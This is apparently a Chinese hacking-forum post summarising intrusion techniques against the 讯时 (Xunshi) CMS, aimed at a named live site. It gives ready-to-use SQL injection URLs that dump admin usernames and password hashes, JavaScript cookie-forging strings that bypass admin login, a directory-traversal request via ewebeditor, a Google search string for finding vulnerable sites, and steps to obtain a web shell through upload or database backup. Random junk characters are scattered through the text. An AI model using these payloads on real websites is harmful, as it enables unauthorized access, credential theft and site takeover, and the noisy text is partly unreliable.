讯时漏洞总结

admin

by:血封忆尘

在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了（随着版本的更新）

9 b! p9 Z9 {5 x4 D/ f6 Q7 g8 I以下本文总结来自黑防去年第9期杂志上的内容...
1 n! X/ L' A/ M! a  V
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%

26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2

记得千万别多了空格，我测试站的时候就发现多了空格注入不出结果的情况
这里一个注入
- B( I8 `3 r- b! c' }; P
效果如图:
3 W- \9 Y/ h5 `


这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.

2 \# p% L* e% g密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
& _  U3 f7 P5 h0 p8 w+ k, o
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));

: E0 \$ ]# k8 Q+ h* E0 ~; u那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:

" q. w1 ^2 Y3 A, L# _5 T因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞

0 G2 x6 M& Z4 C. D& f  V它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
6 b% \# a0 P. t; U# n
" |) y5 @3 D; t' x3 V& g访问这页面来列目录..步骤如下:
* F; V% h  d7 V: A. F7 e
* J% p/ R* ?8 i- i% X. \javascript:alert(document.cookie="admindj=1")
+ v' T! x: _" K# f( ?
http://www.political-security.co ... asp?id=46&dir=../..
2 ?7 O" q* o+ t7 |& p8 ?9 {
效果如图:



! R& Z; Z) W5 n! x这样全站目录都能瞧了..找到后台目录..进去..
2 v7 X0 ~* d8 Y5 `+ k
" G# `/ e6 l3 o9 q+ o. n/ o8 O那么进了后台怎么拿shell？？上传--备份就ok了..

那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
6 P0 }6 m/ b; y4 i# }: @. y
4 U- Y! K3 o+ v7 |4 R# x% v5 X这个我也碰到过一次..你都可以通过列目录来实现..

javascript:alert(document.cookie="admindj=1")

$ ^. E5 m8 f& P+ ?9 w3 T6 ^http://www.political-security.co ... p?action=BackupData
" ^- O( d) E$ B/ W; P" j. {& S
备份ok..

0 X! h, z. G$ D4 x- Q# W/ l2 w: A那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
/ O' R, @0 g0 U! I7 V5 D
+ }: A3 v) m" l$ v5 q: }在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下

* d/ _$ v; A) a2 P3 `然后访问此页面进行注入..步骤如下:
! N$ _1 u6 k( J5 l: ?* v
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")

! y. l" Y, C3 ^  X" o, r然后请求admin/admin_chk.asp页面

% g' I2 Q' b: r2 }4 I3 y输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
0 n( I' j+ {/ w
1 x% a8 {* A3 v2 O26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin

效果如图所示:
& \5 H# ]$ \7 e  J
( q" _& j! Q& ?- |" k$ o7 }% f
; ^) y! H; n0 k1 b! Q" y0 ]
0 M" u0 N0 N  w- {* \: K8 C讯时漏洞2
google关键字：inurl:news_more.asp?lm2= （关键字很多的自己定义吧）
' T$ _% X- p+ q0 ?
* y, [7 Y& J' z- `2 i, X- s1、/admin/admin_news_pl_view.asp?id=1
. ^. D0 U6 D, K+ u& t' X7 b# `  }//id任意 填入以下语句
; w( E) l7 ]  d# V# l, f; m
& v* x- K' I1 S2、有时1显示错误信息的时候继续往后退2，3，4，我退到11才找到了页面，郁闷！


" n# m7 h) x( Z# d1 C; S/ c' \
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='

, t7 Y& X& y! \) H3 D
. D& l4 t- d! V6 Y8 F8 q& c" _" y% O
9 K3 h' p5 C7 c( D6 J爆出管理员帐号和密码了
- `1 o, h7 H+ s8 S6 f

) _  Y* N! |& _  |# e' K+ I" |" b
) x4 _) I$ m. |, M2 K$ t4、cookies进后台
( V7 e3 C: \- ^: @
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));

* {  j% ^1 H! ?2 m, O) L4 Z

5、后台用了cookie验证，直接访问http://www.political-security.com/admin/admin_index.asp就OK了！
1 P( p( K# d  g
- @! k8 b5 I$ k" ?$ l7 Z) u
" s# Q% i1 I/ ]- X7 Z3 Q6 ]
" I% K/ r  l, l/ X4 H6 \4 J6、后台有上传和备份取SHELL不难。

) g" J9 c- v; `( U7、讯时还有个列目录漏洞：http://www.political-security.co ... asp?id=46&dir=../..

逍遥复仇：我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL，有的说虽然后台显示但备份页面是存在的，登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData，我这个没有，郁闷着呢，谁还有其他办法提供一下，谢谢！
8 n& r5 X& H7 G  F+ u( W$ s

/ I0 @, ~4 [0 F+ E2 }